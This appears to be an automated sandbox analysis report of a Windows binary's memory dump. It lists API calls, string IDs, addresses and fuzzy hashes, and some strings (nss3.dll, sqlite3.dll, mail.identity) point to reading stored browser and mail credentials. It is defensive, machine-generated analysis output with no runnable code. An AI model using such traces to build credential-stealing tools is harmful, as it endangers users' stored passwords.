                                                                                                                    • Part of subcall function 00406F30: malloc.MSVCRT ref: 00406F4C
                                                                                                                    • Part of subcall function 00406F30: memcpy.MSVCRT(00000000,00000000,00000000,00000000,`'v,00407A43,00000001,?,00000000,`'v,00407DBD,00000000,?,?), ref: 00406F64
                                                                                                                    • Part of subcall function 00406F30: free.MSVCRT ref: 00406F6D
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: free$mallocmemcpy
                                                                                                                  • String ID: `'v$`'v$`'v
                                                                                                                  • API String ID: 3401966785-538996858
                                                                                                                  APIs
                                                                                                                  • memset.MSVCRT ref: 0040C922
                                                                                                                  • SendMessageA.USER32(00000000,00000423,00000000,00000000), ref: 0040C966
                                                                                                                  • GetMenuStringA.USER32(?,00000103,?,0000004F,00000000), ref: 0040C980
                                                                                                                  • PostMessageA.USER32(?,00000402,00000000,00000000), ref: 0040CA23
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: Message$MenuPostSendStringmemset
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3798638045-0
                                                                                                                  • Opcode ID: 5260d67871d0b89722168e7d498f4e0a86ca69d9cc9d8627ca4b69d99b7a7acc
                                                                                                                  • Instruction ID: 1bc0f942f430aed347c7303033341c470b8779a554354b53929018aa447f6f2a
                                                                                                                  • Opcode Fuzzy Hash: 5260d67871d0b89722168e7d498f4e0a86ca69d9cc9d8627ca4b69d99b7a7acc
                                                                                                                  • Instruction Fuzzy Hash: A241D071600215EBCB24CF24C8C5B97B7A4BF05325F1483B6E958AB2D2C3789D81CBD8
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00409DED: ??2@YAPAXI@Z.MSVCRT(00000000,?,00000000), ref: 00409E0E
                                                                                                                    • Part of subcall function 00409DED: ??3@YAXPAX@Z.MSVCRT(00000000,?,00000000), ref: 00409ED5
                                                                                                                  • strlen.MSVCRT ref: 0040B60B
                                                                                                                  • atoi.MSVCRT(?,00000000,?,76270A60,?,00000000), ref: 0040B619
                                                                                                                  • _mbsicmp.MSVCRT ref: 0040B66C
                                                                                                                  • _mbsicmp.MSVCRT ref: 0040B67F
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: _mbsicmp$??2@??3@atoistrlen
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 4107816708-0
                                                                                                                  • Opcode ID: 8a979a692496cc45569841ba41d4e8351d04b0c3b5ff677985e3e0399502aae0
                                                                                                                  • Instruction ID: e44d10e2ba05df3f3c4ea20365ac2b40f6a529c5f902ff1350b2aa0f2f7d2ce1
                                                                                                                  • Opcode Fuzzy Hash: 8a979a692496cc45569841ba41d4e8351d04b0c3b5ff677985e3e0399502aae0
                                                                                                                  • Instruction Fuzzy Hash: 3A413D35900204EFCF10DFA9C481AA9BBF4FF48348F1144BAE815AB392D739DA41CB99
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: strlen
                                                                                                                  • String ID: >$>$>
                                                                                                                  • API String ID: 39653677-3911187716
                                                                                                                  • Opcode ID: 6e84f8e65513e4ca611a7ecef136956de2a5ef3a612ab72f4111d806a255a350
                                                                                                                  • Instruction ID: 00f684ae2741cafacb4c0f359147db44c9a3c2c025b4d94400920e38b4f60055
                                                                                                                  • Opcode Fuzzy Hash: 6e84f8e65513e4ca611a7ecef136956de2a5ef3a612ab72f4111d806a255a350
                                                                                                                  • Instruction Fuzzy Hash: E131261180D6C4AEEB11CFA880463EEFFB05FA2304F5886DAD0D047743C67C964AC3AA
                                                                                                                  APIs
                                                                                                                  • memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D248
                                                                                                                  • memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D272
                                                                                                                  • memcpy.MSVCRT(?,00000000,00000008,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D296
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: memcpy
                                                                                                                  • String ID: @
                                                                                                                  • API String ID: 3510742995-2766056989
                                                                                                                  • Opcode ID: 5364360adcdec80b12010bd2de721da4a734fa53c949916e07c670fac02dc71b
                                                                                                                  • Instruction ID: 6d1199ef97cb2679a5b3fe4a4c98cea7b7ae300cfbacc21e3dff9814a3884c4c
                                                                                                                  • Opcode Fuzzy Hash: 5364360adcdec80b12010bd2de721da4a734fa53c949916e07c670fac02dc71b
                                                                                                                  • Instruction Fuzzy Hash: 41113DB2E007046BDB288E96DC80D5A77A8EFA0354700013FFE06662D1F639EA5DC7D8
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: _strcmpi
                                                                                                                  • String ID: C@$mail.identity
                                                                                                                  • API String ID: 1439213657-721921413
                                                                                                                  • Opcode ID: 7f34e83aea2ba6c2d35b03d1c240e84e4999e9cdc42306934c4a033b456bfb77
                                                                                                                  • Instruction ID: e081b0b03caa8c584547328dd3c7b46ba64ccdb110812537a35def5e1e6d8c92
                                                                                                                  • Opcode Fuzzy Hash: 7f34e83aea2ba6c2d35b03d1c240e84e4999e9cdc42306934c4a033b456bfb77
                                                                                                                  • Instruction Fuzzy Hash: DD110A325002199BEB20AA65DC41E8A739CEF00358F10453FF545B6182EF38F9598B98
                                                                                                                  APIs
                                                                                                                  • memset.MSVCRT ref: 00406640
                                                                                                                    • Part of subcall function 004063B2: memset.MSVCRT ref: 0040644F
                                                                                                                    • Part of subcall function 004063B2: memcpy.MSVCRT(?,00000060,?,?,00000000,?), ref: 00406462
                                                                                                                    • Part of subcall function 004063B2: memcpy.MSVCRT(?,00000060,?,?,?,?,?,00000000,?), ref: 00406475
                                                                                                                  • memcmp.MSVCRT(?,00456EA0,00000010,?,?,?,00000060,?,?,00000000,00000000), ref: 00406672
                                                                                                                  • memcpy.MSVCRT(?,?,00000018,?,00000060,?,?,00000000,00000000), ref: 00406695
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: memcpy$memset$memcmp
                                                                                                                  • String ID: Ul@
                                                                                                                  • API String ID: 270934217-715280498
                                                                                                                  • Opcode ID: ff49a6b21300bdc1e28d83de90f780c1e5e431fdc449c6fd399a747e7733bd1d
                                                                                                                  • Instruction ID: 50cfa42ee3f36d69bd2a91aaf20a03d2fa08f341615043147a7a382cdea3e611
                                                                                                                  • Opcode Fuzzy Hash: ff49a6b21300bdc1e28d83de90f780c1e5e431fdc449c6fd399a747e7733bd1d
                                                                                                                  • Instruction Fuzzy Hash: 46017572A0020C6BEB10DAA58C06FEF73ADAB44705F450436FE49F2181E679AA1987B5
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00408DB6: LoadStringA.USER32(00000000,0000000D,?,?), ref: 00408E7F
                                                                                                                    • Part of subcall function 00408DB6: memcpy.MSVCRT(00000000,00000001,?,?,?,?,?,00000000,76270A60), ref: 00408EBE
                                                                                                                  • sprintf.MSVCRT ref: 0040B929
                                                                                                                  • SendMessageA.USER32(?,00000401,00000000,?), ref: 0040B98C
                                                                                                                    • Part of subcall function 00408DB6: _mbscpy.MSVCRT(0045A550,strings,?,?,00409CE2,?,?,?,?,?,00000000,76270A60), ref: 00408E31
                                                                                                                    • Part of subcall function 00408DB6: strlen.MSVCRT ref: 00408E4F
                                                                                                                  • sprintf.MSVCRT ref: 0040B953
                                                                                                                  • _mbscat.MSVCRT ref: 0040B966
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: sprintf$LoadMessageSendString_mbscat_mbscpymemcpystrlen
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 203655857-0
                                                                                                                  • Opcode ID: 2ce3bf29076009c9b33a0812678365ae05abee5bebdb1db4c2a4298f5e83ad1b
                                                                                                                  • Instruction ID: 0d6227c2dffbdb2154d3321facad49e181a647ebd34d8d5e6c5aab0b846496ed
                                                                                                                  • Opcode Fuzzy Hash: 2ce3bf29076009c9b33a0812678365ae05abee5bebdb1db4c2a4298f5e83ad1b
                                                                                                                  • Instruction Fuzzy Hash: EE0117B2500308A6E721EB75DC87FE773ACAB54704F04046AB659B61C3DA78E5444A59
                                                                                                                  APIs
                                                                                                                  • memset.MSVCRT ref: 0040ADE8
                                                                                                                  • memset.MSVCRT ref: 0040ADFE
                                                                                                                    • Part of subcall function 0040A4E6: _mbscpy.MSVCRT(00000000,?,0040ABD2,?,?,?), ref: 0040A4EB
                                                                                                                    • Part of subcall function 0040A4E6: _strlwr.MSVCRT ref: 0040A52E
                                                                                                                  • sprintf.MSVCRT ref: 0040AE28
                                                                                                                    • Part of subcall function 00406D33: strlen.MSVCRT ref: 00406D40
                                                                                                                    • Part of subcall function 00406D33: WriteFile.KERNEL32(0044CBC0,00000001,00000000,`'v,00000000,?,?,0040A7BE,00000001,0044CBC0,76270A60), ref: 00406D4D
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: memset$FileWrite_mbscpy_strlwrsprintfstrlen
                                                                                                                  • String ID: </%s>
                                                                                                                  • API String ID: 3699762281-259020660
                                                                                                                  • Opcode ID: 8cab70514fe5aa4f21475794247a492732dcbe2e03c6ed67b3b3c257d80e3403
                                                                                                                  • Instruction ID: ff04cb2e9b10d1c503b051559ee948e99af9d8289afd69eb184e92e88926625d
                                                                                                                  • Opcode Fuzzy Hash: 8cab70514fe5aa4f21475794247a492732dcbe2e03c6ed67b3b3c257d80e3403
                                                                                                                  • Instruction Fuzzy Hash: CF01F97290012967E721A619CC46FDEB76C9F54304F0500FAB50DF3142DA74AA448BA5
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: _ultoasprintf
                                                                                                                  • String ID: %s %s %s
                                                                                                                  • API String ID: 432394123-3850900253
                                                                                                                  • Opcode ID: 314d7e330c7070d124fa50e0e353eda456261e74e4a8aa7da6b91d27fde07fbe
                                                                                                                  • Instruction ID: 5b4e28b1b4fc8494891684f3550fd3cb18a3cec27640a2844273e51cea36df92
                                                                                                                  • Opcode Fuzzy Hash: 314d7e330c7070d124fa50e0e353eda456261e74e4a8aa7da6b91d27fde07fbe
                                                                                                                  • Instruction Fuzzy Hash: 80412331504A15C7C93595648B8DBEBA3A8BB46300F5804BFDCAAB32C0D3FCAD42865E
                                                                                                                  APIs
                                                                                                                  • LoadMenuA.USER32(00000000), ref: 00409078
                                                                                                                  • sprintf.MSVCRT ref: 0040909B
                                                                                                                    • Part of subcall function 00408F1B: GetMenuItemCount.USER32(?), ref: 00408F31
                                                                                                                    • Part of subcall function 00408F1B: memset.MSVCRT ref: 00408F55
                                                                                                                    • Part of subcall function 00408F1B: GetMenuItemInfoA.USER32(?), ref: 00408F8B
                                                                                                                    • Part of subcall function 00408F1B: memset.MSVCRT ref: 00408FB8
                                                                                                                    • Part of subcall function 00408F1B: strchr.MSVCRT ref: 00408FC4
                                                                                                                    • Part of subcall function 00408F1B: _mbscat.MSVCRT ref: 0040901F
                                                                                                                    • Part of subcall function 00408F1B: ModifyMenuA.USER32(?,?,00000400,?,?), ref: 0040903B
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: Menu$Itemmemset$CountInfoLoadModify_mbscatsprintfstrchr
                                                                                                                  • String ID: menu_%d
                                                                                                                  • API String ID: 1129539653-2417748251
                                                                                                                  • Opcode ID: be058396830e840a3b70168f9115533db366257c5066184df4aab31ac4a42a38
                                                                                                                  • Instruction ID: bbc3668ae8aad1463aedfde5e5dd5b48340f77aa4c3989790123ead7330def9b
                                                                                                                  • Opcode Fuzzy Hash: be058396830e840a3b70168f9115533db366257c5066184df4aab31ac4a42a38
                                                                                                                  • Instruction Fuzzy Hash: 2ED0C260A4124036EA2023366C0AF4B1A099BC271AF14022EF000B20C3EBFC844482BE
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  • failed memory resize %u to %u bytes, xrefs: 00411706
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: _msizerealloc
                                                                                                                  • String ID: failed memory resize %u to %u bytes
                                                                                                                  • API String ID: 2713192863-2134078882
                                                                                                                  • Opcode ID: b5cbcb03e4e476f93ec765dc128528ecfd056f92ca38a68215b2957d827f1bcd
                                                                                                                  • Instruction ID: 6d708a2afe7937de994116278d2c06faa365a3e4d7322368aba5da3f7b150b0b
                                                                                                                  • Opcode Fuzzy Hash: b5cbcb03e4e476f93ec765dc128528ecfd056f92ca38a68215b2957d827f1bcd
                                                                                                                  • Instruction Fuzzy Hash: DBD0C2329092107EEB152250AC03B5FAB51DB80374F25850FF658451A1E6795C108389
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00406F96: GetModuleFileNameA.KERNEL32(00000000,00000104,00000104,00409805,00000000,00409723,?,00000000,00000104,?), ref: 00406FA1
                                                                                                                  • strrchr.MSVCRT ref: 00409808
                                                                                                                  • _mbscat.MSVCRT ref: 0040981D
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: FileModuleName_mbscatstrrchr
                                                                                                                  • String ID: _lng.ini
                                                                                                                  APIs
                                                                                                                  • strlen.MSVCRT ref: 00406D40
                                                                                                                  • WriteFile.KERNEL32(0044CBC0,00000001,00000000,`'v,00000000,?,?,0040A7BE,00000001,0044CBC0,76270A60), ref: 00406D4D
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: FileWritestrlen
                                                                                                                  • String ID: `'v
                                                                                                                  APIs
                                                                                                                  • _mbscpy.MSVCRT(00000000,00000000,sqlite3.dll,00402116,00000000,nss3.dll), ref: 004070EB
                                                                                                                    • Part of subcall function 00406D55: strlen.MSVCRT ref: 00406D56
                                                                                                                    • Part of subcall function 00406D55: _mbscat.MSVCRT ref: 00406D6D
                                                                                                                  • _mbscat.MSVCRT ref: 004070FA
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: _mbscat$_mbscpystrlen
                                                                                                                  • String ID: sqlite3.dll
                                                                                                                  APIs
                                                                                                                  • GetWindowLongA.USER32(?,000000EC), ref: 004073D0
                                                                                                                  • SetWindowLongA.USER32(00000001,000000EC,00000000), ref: 004073E2
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: LongWindow
                                                                                                                  • String ID: MZ@
                                                                                                                  APIs
                                                                                                                  • GetPrivateProfileStringA.KERNEL32(Server Details,?,0044C52F,A4@,0000007F,?), ref: 004033C8
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: PrivateProfileString
                                                                                                                  • String ID: A4@$Server Details
                                                                                                                  APIs
                                                                                                                  • memcpy.MSVCRT(?,?,0000201C), ref: 0042C8E0
                                                                                                                  • memcpy.MSVCRT(?,?,?), ref: 0042C917
                                                                                                                  • memset.MSVCRT ref: 0042C932
                                                                                                                  • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0042C96E
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: memcpy$memset
                                                                                                                  • String ID:
                                                                                                                  APIs
                                                                                                                  • strlen.MSVCRT ref: 0040849A
                                                                                                                  • memset.MSVCRT ref: 004084D2
                                                                                                                  • memcpy.MSVCRT(?,00000000,?,?,?,?,7618E430,?,00000000), ref: 0040858F
                                                                                                                  • LocalFree.KERNEL32(00000000,?,?,?,?,7618E430,?,00000000), ref: 004085BA
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: FreeLocalmemcpymemsetstrlen
                                                                                                                  • String ID:
                                                                                                                  APIs
                                                                                                                  • memcpy.MSVCRT(?,?,00000010), ref: 004161F4
                                                                                                                  • memcpy.MSVCRT(?,?,00000004), ref: 00416218
                                                                                                                  • memcpy.MSVCRT(?,?,00000004), ref: 0041623F
                                                                                                                  • memcpy.MSVCRT(?,?,00000008), ref: 00416265
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: memcpy
                                                                                                                  • String ID:
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 004073B3: memset.MSVCRT ref: 004073C1
                                                                                                                  • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,?,0040402E,00000000,?,0040CD2D,00000000), ref: 004099A3
                                                                                                                  • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,?,0040402E,00000000,?,0040CD2D,00000000), ref: 004099CC
                                                                                                                  • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,?,0040402E,00000000,?,0040CD2D,00000000), ref: 004099ED
                                                                                                                  • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,?,0040402E,00000000,?,0040CD2D,00000000), ref: 00409A0E
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: ??2@$memset
                                                                                                                  • String ID:
                                                                                                                  APIs
                                                                                                                  • strlen.MSVCRT ref: 0040797A
                                                                                                                  • free.MSVCRT ref: 0040799A
                                                                                                                    • Part of subcall function 00406F30: malloc.MSVCRT ref: 00406F4C
                                                                                                                    • Part of subcall function 00406F30: memcpy.MSVCRT(00000000,00000000,00000000,00000000,`'v,00407A43,00000001,?,00000000,`'v,00407DBD,00000000,?,?), ref: 00406F64
                                                                                                                    • Part of subcall function 00406F30: free.MSVCRT ref: 00406F6D
                                                                                                                  • free.MSVCRT ref: 004079BD
                                                                                                                  • memcpy.MSVCRT(?,?,?,00000001,?,00000000,?,?,00407E04,?,00000000,?,?), ref: 004079DD
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 0000008A.00000002.36305443037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 0000008A.00000002.36305443037.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  • Associated: 0000008A.00000002.36305443037.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                  Similarity
                                                                                                                  • API ID: free$memcpy$mallocstrlen
                                                                                                                  • String ID: